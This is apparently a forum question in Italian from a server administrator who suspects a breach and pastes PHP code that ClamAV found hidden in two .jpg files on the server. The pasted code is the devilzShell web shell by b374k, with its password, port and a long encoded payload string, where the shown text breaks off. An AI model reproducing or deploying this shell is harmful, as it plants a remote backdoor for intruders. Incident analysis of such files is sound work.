Sono davvero compromesso?

3

così il nostro responsabile IT mi ha chiamato e mi ha detto che qualcuno gli ha inviato il nostro contenuto server / etc / passwd, e ha detto che quest'uomo ha fatto un'iniezione SQL sul nostro server. Quindi ho controllato tutti i log della cronologia degli utenti e non ho trovato nulla, inoltre ho controllato auth.log ma non è successo nulla di sospetto.

Poi ho installato clamav, scansionato tutta la directory usando clamscan -r -i /, trovato questi file:

/home/project/prod/project.api/public/images/rOIqOd1sz.jpg /home/project/prod/project.api/public/images/rOXmZ1Nsz.jpg

quindi in pratica sono immagini, ma contengono script, ecco il contenuto dello script:

<?php
//
// devilzShell <[php]>
// ^^^^^^^^^^^^
// author: b374k
// greets: devilzc0der(s) and all of you who love peace and freedom
//
//
// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
// Jayalah Indonesiaku


$shell_name = "Nadipa Luvchuterusz ~\ PERCAYA :) ";
$shell_fake_name = "root@Lvchtrzs:~\ Login ";
$shell_title = " ~/ ".$shell_name." \~";
$shell_version = "v2";
$shell_password = "riska";
$shell_fav_port = "12345";
$shell_color = "Black";
$shell_code = "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